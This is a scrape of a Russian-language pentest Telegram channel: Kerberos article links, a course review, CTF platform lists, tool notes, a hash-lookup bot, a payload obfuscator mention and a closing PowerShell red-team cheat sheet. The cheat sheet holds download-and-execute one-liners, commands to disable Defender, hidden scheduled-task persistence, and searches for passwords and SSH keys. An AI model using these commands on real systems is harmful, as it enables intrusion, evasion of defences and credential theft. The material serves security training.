Lares Labs
Kerberos I - Overview
This post, is the first in the series and will aim to provide an overview of the protocol, from its beginnings to the different (ab)use techniques.
Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Lares Labs
Kerberos III - User Impersonation
The goal of this post, whether we are adversaries or defenders, is to help us understand the multiple ways that Kerberos offers to access resources using the credential material gathered.
Серия публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Lares Labs
Kerberos IV - Delegations
In the third part of this Kerberos series, we focused on leveraging user credential material for impersonation through techniques such as Pass-the-Key/Ticket/Cache/Certificate, and Shadow Credentials. Additionally, we explored how to manage and forge Kerberos…
Заключительная, 4 часть из серии публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке.
Software:
#kerberos #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Недавно закончил обучение на курсе
Далее мое сугубо индивидуальное мнение
На формирование итогового мнения о курсе влияет большое количество факторов:
▪️ количество времени, которое вы готовы уделять курсу
▪️ уровень ваших знаний по теме курса в момент его старта
▪️ уровень ваших знаний по смежным темам и т.д.
Причины выбора курса:
1. Авторский/кураторский состав
Думаю, что решающим фактором записаться на курс в первом потоке конкретно для меня была строка в одном из рекламных сообщений: "Первые два потока кураторами курса являются его авторы"
Там он и рассказал, что является Red и Purple тимлидом. В интервью, которое он давал перед стартом курса, он подтверждает это. Канал Павла
2. Отсутствие аналогов в 🇷🇺 РФ
Этот тезис был одним из рекламных слоганов. Я думаю, что каждый, кто обучается или обучался на курсах по ИБ примерно представляет себе, как выглядит рынок этих курсов в России. И думаю многие понимают, что это правда.
В русскоязычном сегменте, из известных мне курсов по внутрянке, есть лишь ещё курс по тестированию инфраструктуры от CyberEd. Но он не сосредоточен только на AD. Он также затрагивает темы тестирования инфраструктуры в Linux. Так что данный курс действительно уникальный в данном сегменте.
Курс затрагивает очень большое количество тем.
Начинается с базовых теоретических понятий: объект, лес, домен и т.д.
Далее идет блок, связанный с пентестом
Блок про туннелирование
А потом начинается AD - kerberos, делегирование, уязвимые ACL, ретрансляционные атаки, тестирование
Не смотря на то, что в большинстве своем методички составлены прекрасно, главное преимущество курса, это конечно же, практические лабораторные к каждому уроку. 16 больших стендов для отработки всего изученного материала и экзаменационный стенд.
Количество хостов в домене по мере движения по курсу растет. Количество техник и методик, которые нужно применять, чтобы скомпрометировать машинку также увеличивается.
В лабах работают боты на почтовых сервисах, которые по разному отвечают в зависимости от контекста. Скрипты, которые запускают службы, позволяя реализовать DLL-hijacking. Все лабы логически и последовательно выстроены.
Большой и сложный экзамен, на решение которого дается 24 часа является отличной проверкой ваших знаний. Только вы, задания и лабораторный стенд.
Огромное спасибо Паше и Мише за разработку отличного курса.
Я почти уверен, что любой, кто самостоятельно сможет пройти данный курс от начала и до конца вполне может претендовать на должность пентестера.
P.S. Для будущих поколений, ребят, курс сложный, рассчитывайте свои навыки, база должна быть приличной. И да прибудет с вами сила!
#active_directory #windows #course #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Pentest-Ground
Vulnerable apps to benchmark your scanners and your skills
Площадка с заведомо уязвимыми веб-приложениями и сетевыми сервисами. Можно использовать для проверки эффективности инструментов поиска уязвимостей или в образовательных целях
Поднятые лаборатории:
Damn Vulnerable Web Application - классическое веб приложение
Damn Vulnerable GraphQL Application - GraphQL
RestFlaw - REST API
ShadowLogic - WebLogic
CipherHeart - Redis
GuardianLeaks - веб приложение
Реверт лаб происходит каждые 30 минут
#pentest #training #dvwa #pentestground #graphql
Please open Telegram to view this post
VIEW IN TELEGRAM
Недавно был пост об отличном сервисе Weakpass у которого в наличии абсолютно бесплатный API
Прикрутил к боту Password lookup (MD5, NTLM, SHA1 или SHA256)
import requests
from aiogram import Router, F
from aiogram.types import Message
import logging
import app.config.cfg as cfg
import json
router: Router = Router()
def check_hash_string(hash_string: str):
try:
headers = {'Content-Type': 'application/json'}
url = requests.get(f'https://weakpass.com/api/v1/search/{hash_string}.json', headers=headers)
output = json.loads(url.text)
hash_info = json.dumps(output, indent=2)
return hash_info
except Exception as e:
logging.warning(e)
@router.message(F.text.startswith(cfg.all_commands['check_hash']))
async def check_hash(message: Message):
try:
msg = message.text.split()
if len(msg) == 2:
await message.answer(f'<b>{check_hash_string(msg[1])}</b>', disable_web_page_preview=True)
else:
await message.answer(f'Пример:\n<code>!check_hash 5f4dcc3b5aa765d61d8327deb882cf99</code>')
except Exception as e:
logging.warning(e)
Работает в чате канала
!check_hash 5f4dcc3b5aa765d61d8327deb882cf99#weakpass #api #bot #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Как вы уже знаете, мой предыдущий канал был заблокирован.
Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.
К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.
Вот что написано в ToS:
▪️ Не использовать мессенджер для рассылки спама или обмана пользователей;▪️ Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;▪️ Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.▪️ Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.
Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал
Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.
Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19😢2
www.warp.dev
Warp: The Agentic Development Environment
The fastest way to build with multiple AI agents, from writing code to deploying it. Trusted by over half a million engineers, Warp gives developers speed, privacy, and control to ship faster.
Современный многофункциональный терминал со встроенным AI ассистентом (free 50 запросов в неделю)
Написан на
В данный момент работает под
UPD. Подвезли поддержку
Пока только начал тестировать, немного непривычно, но довольно удобный и богатый функционал радует.
Установка via winget:
winget install Warp.Warp
Установка:
brew install --cask warp
sudo apt install ./<file>.deb
sudo dnf install ./<file>.rpm
sudo pacman -U ./<file>.pkg.tar.zst
Или добавим репозиторий и устанавливаем 1ой командой:
sudo apt install wget gpg
wget -qO- https://releases.warp.dev/linux/keys/warp.asc | gpg --dearmor > warpdotdev.gpg
sudo install -D -o root -g root -m 644 warpdotdev.gpg /etc/apt/keyrings/warpdotdev.gpg
sudo sh -c 'echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/warpdotdev.gpg] https://releases.warp.dev/linux/deb stable main" > /etc/apt/sources.list.d/warpdotdev.list'
rm warpdotdev.gpg
sudo apt update && sudo apt install warp-terminal
#warp #terminal #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Надоели мне все эти
В моем личном рейтинге занимает твердое первое место, как худшая ОС в истории, которой мне довелось пользоваться 😁😱
#windows
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🌚1
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst)🙃
Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф😁
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$😈
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь
Русскоязычная площадка😎 . Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач
Киберполигон от компании😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.
Путешествие в мир Linux, основные команды, лабы, руководства
Игра из 34 уровней для изучения Linux
Большое количество (~4000) крякми для изучения. Подойдет реверсерам
Для любителей бинарной эксплуатации (PWN)
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.
Огромное (500+) кол-во заданий в самых разных категориях
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности
Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода
Простенький хакер квест состоящий из 20 уровней
#htb #crackmes #bandit #hacking #ctf #ethical
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥5 2 2 2
Напоминаю, что по адресу @whitehat_chat находится чатик, в котором можно пообщаться и задать интересующие вас вопросы, так же там "живет" бот, обладающий полезным функционалом:
!hash a6105c0a611b41b08f1209506350279e
!ss Microsoft Exchange 2019
!poc CVE-2023-46604
!check_hash a6105c0a611b41b08f1209506350279e
!port ya.ru 80
!bridges
!feedback
!qr https://t.iss.one/wh_lab
#bot #chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Я, понятное дело за HackerLab
Проходят 5 команд
Реализовано 13 из 24 критических событий
Всем успехов и немного удачи!
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2 2 1
Высокоскоростной инструмент для пассивного сбора и эффективного обнаружения URL-адресов. От создателей nuclei, написан на
UPD. Добавили scope контроль:
SCOPE:
-us, -url-scope string[] in scope url regex to be followed by urlfinder
-uos, -url-out-scope string[] out of scope url regex to be excluded by urlfinder
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
Установка:
go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest
Запуск:
urlfinder -d tesla.com
# Match и filter
urlfinder -d tesla.com -m support -f faq
urlfinder -d tesla.com -m include-patterns.txt -f exclude-patterns.txt
# JSON export
urlfinder -d tesla.com -j
#urlfinder #soft #golang #web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
2ой день отборов
Проходят 5 команд
Реализовано 17 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Один из лучших инструментов для определения типа хеша. Написан на
UPD. Вышло большое обновление до мажорной 3.0.0 версии - changelog
Поддержка 641 хеша
7 новых типов хешей
Множественные улучшения (описания и исправления для JtR и HC)
Поддержка Ruby 3.4
Поддержка современных алгоритмов (SHA3, Keccak, Blake2, etc.)
Показывает формат для Hashcat и JohntheRipper
Работает как приложение и библиотека
Установка:
gem install haiti-hashПримеры:
haiti 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce
SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Salsa10
Salsa20
Skein-512 [JtR: skein-512]
Skein-1024(512)
Библиотека:
require 'haiti'
# Instantiate a HashIdentifier object that will automatically identify
# the hash type
hi = HashIdentifier.new('786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce')
# Loop over the hash type candidates and retrieve data
hi.type.each do |type|
name = type.name
hashcat_id = type.hashcat
john_ref = type.john
extended = type.extended
samples = type.samples
end
#haiti #hash #soft #ruby
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 2
GitHub
GitHub - DosX-dev/Astral-PE: Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64)
Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64) - DosX-dev/Astral-PE
Протектор для
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export
./Astral-PE.exe payload.exe -o payload_clean.exe
#astralpe #mutator
Please open Telegram to view this post
VIEW IN TELEGRAM
Виртуальная лаборатория, основанная на
Предустановленные лабы и инструменты:
▪️ OWASP Juice Shop▪️ WebGoat▪️ Mutillidae▪️ bWAPP▪️ DVWA▪️ Burp Suite▪️ Nikto▪️ SQLMap
#web #pentest #samurai
Please open Telegram to view this post
VIEW IN TELEGRAM
Показывает прогресс многих Coreutils инструментов, cp, mv, dd, tar, gz и т.д.
Установка в
sudo apt install progress
Использование:
watch progress -q
progress -w
watch progress -wc firefox
progress -c httpd
cp bigfile newfile & progress -mp $!
#progress #coreutils
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 2❤1 1
Заключительный день отборов
В финал пройдут 5 команд
Отчеты принимаются до 22.00
Реализовано 22 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10 2 1
Реализовано 22 из 24 критических событий
2 нерешенных таска объявляю лютейшей уцуцугой
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
Для выполнения некоторых командлетов необходим импортированный AD модуль
Подключаем:
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory
Информация о системе:
Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
Список процессов:
Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending
FailureAudit в логах:
Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}Сканер портов:
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }Выполнить команду на удаленном ПК:
Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)Скачать и выполнить скрипт:
$url = 'https://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)
Execution policy bypass:
Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1
Список доменных юзеров:
# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate
Список залогиненых юзеров:
Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username
Давно не логинились, но УЗ включена:
# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name
Прибить процесс:
Get-Process -Name "Notepad" | Stop-Process -Force
Список установленного ПО:
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate
Мониторинг изменений ФС:
$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }Отключаем Defender:
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true
Задание в планировщик для закрепа:
$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'
Поиск паролей в текстовых файлах:
Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive
Собираем SSH ключи:
Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse
Продолжение следует
#powershell #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤3 2